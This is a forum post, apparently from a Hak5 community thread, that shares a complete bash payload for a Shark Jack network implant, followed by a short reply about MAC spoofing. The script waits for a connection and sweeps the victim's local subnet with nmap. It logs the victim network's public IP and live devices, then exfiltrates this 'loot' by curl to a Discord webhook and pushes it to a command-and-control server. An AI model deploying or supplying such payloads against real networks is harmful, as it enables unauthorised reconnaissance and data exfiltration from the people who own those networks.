  22. Nmap Quickscan with Discord Integration (Cleaned & C2 Enabled) This is a cleaned up output version of the Original Nmap Scan that Hak5 introduces us to. The Payload waits for "Internet Connection" to be present. Once Internet Connection is found, It scans the local subnet for any online devices. - While also logging the Public IP of the Victim's Network (Very useful when you are scanning multiple networks in a short amount of time.) payload.sh #!/bin/bash # Title: Nmap Quickscan w/ Discord Integration (Cleaned & C2 Enabled) # Author: REDD of Private-Locker # Version: 1.3 # # This is a cleaned up output version of the Original Nmap Scan that Hak5 introduces us to. # The Payload waits for "Internet Connection" to be present. Once Internet Connection is found, # It scans the local subnet for any online devices. - While also logging the Public IP of the # Victim's Network (Very useful when you are scanning multiple networks in a short amount of time.) # # Magenta w/ Yellow ........Waiting for Internet # 1st Yellow flashing.......Scanning for Gateway/Subnet # Cyan flashing.............Running Nmap scan on x.0/24 # 2nd Yellow Flashing.......Installing dependencies for Discord Integration # Yellow....................Sent to Discord Webhook # Blue......................Exfiltrating to C2 # Red.......................Failed C2/EXFIL/Scanning # Green.....................Finished # Turn on Discord Integration (Yes = 1, No = 0) DISCORD=0 WEBHOOK='PLACE_DISCORD_WEBHOOK_HERE' # Send Loot as File or Plain Messages (File = 1, Messages = 0) AS_FILE=0 if [ -f "/etc/device.config" ]; then INITIALIZED=1 else INITIALIZED=0 fi LED SETUP NETMODE DHCP_CLIENT while ! ifconfig eth0 | grep "inet addr"; do LED Y SOLID; sleep .2; LED M SOLID; sleep .8; done URL="http://www.example.com" while ! wget $URL -qO /dev/null; do sleep 1; done GET_GATEWAY=$(route -n | grep 'UG[ \t]' | awk '{print $2}') while [ $GET_GATEWAY == "" ]; do sleep 1; done INTERNAL_IP=$(ifconfig | sed -En 's/127.0.0.1//;s/.*inet (addr:)?(([0-9]*\.){3}[0-9]*).*/\2/p') SUBNET=$(echo "$GET_GATEWAY" | awk -F"." '{print $1"."$2"."$3".0/24"}') CHK_SUB=$(echo $INTERNAL_IP | cut -d"." -f1-3) FIN_SUB="${CHK_SUB}.0/24" LED ATTACK; if [ "$SUBNET" != "$FIN_SUB" ]; then LED R FAST; sleep 2; LED R SOLID; else # Fix for Timestamp Update ntpd -gq; sleep 1; DATE_FORMAT=$(date '+%m-%d-%Y_%H:%M:%S') LOOT_DIR="/root/loot/nmap-diag" LOOT_FILE="$LOOT_DIR/diag-${DATE_FORMAT}.txt" if [ ! -d "$LOOT_DIR" ]; then mkdir -p "$LOOT_DIR" fi if [ ! -f "$LOOT_FILE" ]; then touch "$LOOT_FILE" fi # Get Public IP and run NMAP scan PUBLIC_IP=$(wget -q "http://api.ipify.org" -O -) printf "\n Public IP: ${PUBLIC_IP}\n Online Devices for ${SUBNET}:\n--------------------------------------------\n\n" >> "$LOOT_FILE" LED C VERYFAST run_nmap () { nmap -sn --privileged "$SUBNET" --exclude "$INTERNAL_IP" | awk '/Nmap scan report for/{printf " -> ";printf $5;}/MAC Address:/{print " - "substr($0, index($0,$3)) }' >> "$LOOT_FILE" } run_nmap & PID=$! while kill -0 "$PID" 2>&1 >/dev/null; do wait $PID done if [ -s "$LOOT_FILE" ]; then if [ "$DISCORD" == 1 ]; then CURL_CHK=$(which curl) if [ "$CURL_CHK" != "/usr/bin/curl" ]; then LED Y VERYFAST; opkg update;opkg install libcurl curl; fi LED Y SOLID if [ "$AS_FILE" == 1 ]; then FILE=\"$LOOT_FILE\" curl -s -i -H 'Content-Type: multipart/form-data' -F FILE=@$FILE -F 'payload_json={ "wait": true, "content": "Loot has arrived!", "username": "SharkJack" }' $WEBHOOK fi if [ "$AS_FILE" == 0 ]; then while read -r line; do DISCORD_MSG=\"**$line**\" curl -H "Content-Type: application/json" -X POST -d "{\"content\": $DISCORD_MSG}" $WEBHOOK done < "$LOOT_FILE" fi LED G SOLID;sleep 2; fi if [ "$INITIALIZED" == 1 ]; then LED Y SOLID if [ -z "$(pgrep cc-client)" ]; then C2CONNECT while ! pgrep cc-client; do LED B SOLID;sleep .2;LED G SOLID;sleep .8; done fi # Re-issuing C2CONNECT to verify loot push to C2 C2CONNECT sleep 2 C2EXFIL STRING "${LOOT_FILE}" "Nmap Diagnostic for Network ${SUBNET}" LED M VERYFAST; sleep 2; fi LED FINISH; else LED R SOLID; rm -rf "$LOOT_FILE"; fi fi
  23. REDD

    MAC Spoofing

    Uhh you can already change the MAC.. Just needs a work around in the payload..
×
×
  • Create New...